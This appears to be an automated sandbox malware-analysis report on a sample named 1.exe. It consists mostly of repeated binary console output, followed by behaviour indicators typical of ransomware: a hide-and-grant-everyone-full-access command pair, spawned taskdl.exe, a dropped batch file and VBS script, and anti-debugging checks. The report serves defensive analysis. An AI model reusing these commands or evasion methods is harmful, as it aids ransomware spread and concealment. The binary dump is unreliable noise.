Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....).............................w......$...!.......!...!.....(.....!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...$).............................w......$...!.......!...!.8.!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...*)...............................!$...!...Tw.....@..........X.....!..... .!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...0).............................w......$...!.......!...!.....(.....!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...6).............................w......$...!.......!...!.8.!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...<)...............................!$...!...Tw.....@..........X.....!..... .!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...B).............................w......$...!.......!...!.....(.....!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...H).............................w......$...!.......!...!.8.!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...N)...............................!$...!...Tw.....@..........X.....!..... .!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...T).............................w......$...!.......!...!.....(.....!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...Z).............................w......$...!.......!...!.8.!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...`)...............................!$...!...Tw.....@..........X.....!..... .!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...f).............................w......$...!.......!...!.....(.....!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...l).............................w......$...!.......!...!.8.!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...r)...............................!$...!...Tw.....@..........X.....!..... .!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...x).............................w......$...!.......!...!.....4.....!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...~).............................w......$...!.......!...!.8.!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....).............................. !$...!...Tw.....@..........X.....!..... .!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....).............................w......$...!.......!...!.....$.....!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....).............................w......$...!.......!...!.8.!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....)...............................!$...!...Tw.....@..........X.....!..... .!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....).............................w......$...!.......!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....).............................w......$...!.......!...!.8.!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....)............................... $...!...Tw.....@..........X.....!..... .!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....).............................w......$...!.......!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....).............................w......$...!.......!...!.8.!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....)............................... $...!...Tw.....@..........X.....!..... .!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....)..........................L.......`...D...l.!...!...!............w..@.....
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....)..........................L.......`...D...l.!...!...!...!...........@.....
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....)...............................%$.l.!...Tw.....@..........X...."$.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....)............................!......35......c.w."$...5.....................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....)............................!......35......c.w."$...5...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....)...............................%$.l.!...Tw.....@..........X...."$.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....).............................w......$.t.!.....T.!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....*.............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....*................................$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....*.............................w......$.t.!.....T.!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....*.............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....*................................$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...#*.............................w......$.t.!.....T.!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...)*.............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@.../*................................$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...5*.............................w......$.t.!.....T.!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...;*.............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...A*................................$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...G*..................................`.........!.p.!...!............w..@.....
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...M*..................................`.........!.p.!...!...!...........@.....
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...S*...............................!$...!...Tw.....@..........X.....$.....t.!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....*.............................w......$...!.......!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....*.............................w......$...!.......!...!.8.!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....*............................... $...!...Tw.....@..........X.....!..... .!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....*..........................L.......`...D...l.!...!...!............w..@.....
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....*..........................L.......`...D...l.!...!...!...!...........@.....
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....*...............................$$.l.!...Tw.....@..........X...."$.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...4+.............................w......$...!.......!...!.....$.....!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...:+.............................w......$...!.......!...!.8.!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...@+............................... $...!...Tw.....@..........X.....!..... .!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...F+.............................w......$...!.......!...!.....*.....!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...L+.............................w......$...!.......!...!.8.!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...R+............................... $...!...Tw.....@..........X.....!..... .!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...X+.............................w......$...!.......!...!.....z.....!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...^+.............................w......$...!.......!...!.8.!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...d+..............................(!$...!...Tw.....@..........X.....!..... .!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...j+.............................w......$...!.......!...!.....z.....!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...p+.............................w......$...!.......!...!.8.!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...v+..............................(!$...!...Tw.....@..........X.....!..... .!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...|+.............................w......$...!.......!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....+.............................w......$...!.......!...!.8.!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....+............................... $...!...Tw.....@..........X.....!..... .!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....+.............................w......$...!.......!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....+.............................w......$...!.......!...!.8.!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....+............................... $...!...Tw.....@..........X.....!..... .!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....+.............................w......$...!.......!...!.....B.....!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....+.............................w......$...!.......!...!.8.!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....+............................... $...!...Tw.....@..........X.....!..... .!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....+.............................w......$...!.......!...!.....$.....!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....+.............................w......$...!.......!...!.8.!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....+............................... $...!...Tw.....@..........X.....!..... .!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....+.............................w......$.t.!.....T.!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....+.............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....+................................$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....+..................................`.........!.p.!...!............w..@.....
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....+..................................`.........!.p.!...!...!...........@.....
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....+............................... $...!...Tw.....@..........X.....$.....t.!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....+..................................`.........!.p.!...!............w..@.....
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....+..................................`.........!.p.!...!...!...........@.....
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....,............................... $...!...Tw.....@..........X.....$.....t.!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...#,.............................w......$...!.......!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...),.............................w......$...!.......!...!.p.!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@.../,................................$...!...Tw.....@..........X.....!.....X.!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....-.............................w....."$.<.!.......!.H.!.........H.!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....-.............................w....."$.<.!.......!.H.!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....-...............................$$...!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....-..................................`.........!.8.!...!............w..@.....
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....-..................................`.........!.8.!...!.T.!...........@.....
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....-...............................($...!...Tw.....@..........X....&$.....<.!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....-.............................w......$...!.......!...!.....r.....!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....-.............................w......$...!.......!...!.8.!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....-...............................!$...!...Tw.....@..........X.....!..... .!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....-.............................w......$...!.......!...!.....r.....!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....-.............................w......$...!.......!...!.8.!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....-...............................!$...!...Tw.....@..........X.....!..... .!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....-..........................L.......`...D...l.!...!...!............w..@.....
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....-..........................L.......`...D...l.!...!...!...!...........@.....
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....................................$$.l.!...Tw.....@..........X...."$.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@..../.............................w....."$.<.!.......!.H.!.........H.!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@..../.............................w....."$.<.!.......!.H.!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@..../..............................0%$...!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@..../.............................w....."$.<.!.......!.H.!.........H.!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@..../.............................w....."$.<.!.......!.H.!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@... /..............................0%$...!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...&/.............................w....."$.<.!.......!.H.!.........H.!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...,/.............................w....."$.<.!.......!.H.!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...2/..............................0%$...!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...8/.............................w....."$.<.!.......!.H.!.........H.!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...>/.............................w....."$.<.!.......!.H.!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...D/..............................0%$...!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...J/.............................w....."$.<.!.......!.H.!.........H.!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...P/.............................w....."$.<.!.......!.H.!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...V/..............................0%$...!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...\/.............................w....."$.<.!.......!.H.!.........H.!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...b/.............................w....."$.<.!.......!.H.!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...h/..............................0%$...!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...n/.............................w....."$.<.!.......!.H.!.........H.!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...t/.............................w....."$.<.!.......!.H.!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...z/..............................0%$...!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@..../.............................w....."$.<.!.......!.H.!.........H.!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@..../.............................w....."$.<.!.......!.H.!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@..../..............................0%$...!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@..../.............................w....."$.<.!.......!.H.!.........H.!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@..../.............................w....."$.<.!.......!.H.!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@..../..............................0%$...!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@..../.............................w....."$.<.!.......!.H.!.........H.!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@..../.............................w....."$.<.!.......!.H.!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@..../..............................0%$...!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@..../.............................w....."$.<.!.......!.H.!.........H.!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@..../.............................w....."$.<.!.......!.H.!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@..../..............................0%$...!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@..../.............................w....."$.<.!.......!.H.!.........H.!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@..../.............................w....."$.<.!.......!.H.!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@..../..............................0%$...!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@..../.............................w....."$.<.!.......!.H.!.........H.!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@..../.............................w....."$.<.!.......!.H.!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@..../..............................0%$...!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@..../.............................w....."$.<.!.......!.H.!.........H.!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@..../.............................w....."$.<.!.......!.H.!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@..../..............................0%$...!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@..../.............................w....."$.<.!.......!.H.!.........H.!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....0.............................w....."$.<.!.......!.H.!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....0..............................0%$...!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....0.............................w....."$.<.!.......!.H.!.........H.!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....0.............................w....."$.<.!.......!.H.!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....0..............................0%$...!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@..."0.............................w....."$.<.!.......!.H.!.........H.!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...(0.............................w....."$.<.!.......!.H.!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....0..............................0%$...!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...40.............................w....."$.<.!.......!.H.!.........H.!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...:0.............................w....."$.<.!.......!.H.!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...@0..............................0%$...!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...F0.............................w....."$.<.!.......!.H.!.........H.!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...L0.............................w....."$.<.!.......!.H.!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...R0..............................0%$...!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...X0.............................w....."$.<.!.......!.H.!.........H.!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...^0.............................w....."$.<.!.......!.H.!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...d0..............................0%$...!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...j0.............................w....."$.<.!.......!.H.!.........H.!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...p0.............................w....."$.<.!.......!.H.!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...v0..............................0%$...!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...|0.............................w....."$.<.!.......!.H.!.........H.!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....0.............................w....."$.<.!.......!.H.!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....0..............................0%$...!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....0.............................w....."$.<.!.......!.H.!.........H.!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....0.............................w....."$.<.!.......!.H.!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....0..............................0%$...!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....0.............................w....."$.<.!.......!.H.!.........H.!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....0.............................w....."$.<.!.......!.H.!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....0..............................0%$...!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....0.............................w....."$.<.!.......!.H.!.........H.!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....0.............................w....."$.<.!.......!.H.!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....0..............................0%$...!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....0.............................w....."$.<.!.......!.H.!.........H.!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....0.............................w....."$.<.!.......!.H.!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....0..............................0%$...!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....0.............................w....."$.<.!.......!.H.!.........H.!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....0.............................w....."$.<.!.......!.H.!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....0..............................0%$...!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....0.............................w....."$.<.!.......!.H.!.........H.!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....0.............................w....."$.<.!.......!.H.!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....0..............................0%$...!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....0.............................w....."$.<.!.......!.H.!.........H.!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....1.............................w....."$.<.!.......!.H.!...!.................
PE file has an executable .text section and no other executable sectionShow sources
Source: 1.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Reads ini filesShow sources
Source: C:\Windows\System32\cscript.exeFile read: C:\Users\luketaylor\Desktop\desktop.ini
Reads software policiesShow sources
Source: C:\1.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Spawns processesShow sources
Source: unknownProcess created: C:\1.exe 'C:\1.exe'
Source: unknownProcess created: C:\Windows\System32\attrib.exe attrib +h .
Source: unknownProcess created: C:\Windows\System32\icacls.exe icacls . /grant Everyone:F /T /C /Q
Source: unknownProcess created: C:\taskdl.exe taskdl.exe
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c 67541494599812.bat
Source: unknownProcess created: C:\Windows\System32\cscript.exe cscript.exe //nologo m.vbs
Source: unknownProcess created: C:\taskdl.exe taskdl.exe
Source: unknownProcess created: C:\taskdl.exe taskdl.exe
Source: unknownProcess created: C:\taskdl.exe taskdl.exe
Source: C:\1.exeProcess created: C:\Windows\System32\attrib.exe attrib +h .
Source: C:\1.exeProcess created: C:\Windows\System32\icacls.exe icacls . /grant Everyone:F /T /C /Q
Source: C:\1.exeProcess created: C:\taskdl.exe taskdl.exe
Source: C:\1.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c 67541494599812.bat
Source: C:\1.exeProcess created: C:\taskdl.exe taskdl.exe
Source: C:\1.exeProcess created: C:\taskdl.exe taskdl.exe
Source: C:\1.exeProcess created: C:\taskdl.exe taskdl.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript.exe //nologo m.vbs
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Windows\System32\cscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Creates mutexesShow sources
Source: C:\1.exeMutant created: \Sessions\1\BaseNamedObjects\Global\MsWinZonesCacheCounterMutexA0
Source: C:\1.exeMutant created: \Sessions\1\BaseNamedObjects\MsWinZonesCacheCounterMutexA
PE file contains executable resources (Code or Archives)Show sources
Source: 1.exeStatic PE information: Resource name: XIA type: Zip archive data, at least v2.0 to extract
Sample file is different than original file name gathered from version infoShow sources
Source: 1.exeBinary or memory string: OriginalFilenamekbdlv.dllj% vs 1.exe
Source: 1.exeBinary or memory string: OriginalFilenameLODCTR.EXEj% vs 1.exe
Source: 1.exeBinary or memory string: OriginalFilenamediskpart.exej% vs 1.exe
Potential malicious VBS script found (suspicious strings)Show sources
Source: C:\Windows\System32\cmd.exeDropped file: SET ow = WScript.CreateObject("WScript.Shell")

HIPS / PFW / Operating System Protection Evasion:

barindex
May try to detect the Windows Explorer process (often used for injection)Show sources
Source: 1.exeBinary or memory string: Progman
Source: 1.exeBinary or memory string: Program Manager
Source: 1.exeBinary or memory string: Shell_TrayWnd

Anti Debugging:

barindex
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))Show sources
Source: C:\1.exeSystem information queried: KernelDebuggerInformation
Contains functionality which may be used to detect a debugger (GetProcessHeap)Show sources
Source: C:\1.exeCode function: 0_2_004021E9 strrchr,SetLastError,GetModuleHandleA,GetNativeSystemInfo,GetProcessHeap,HeapAlloc,memcpy,SetLastError,0_2_004021E9

Malware Analysis System Evasion:

barindex
Contains functionality to enumerate / list files inside a directoryShow sources
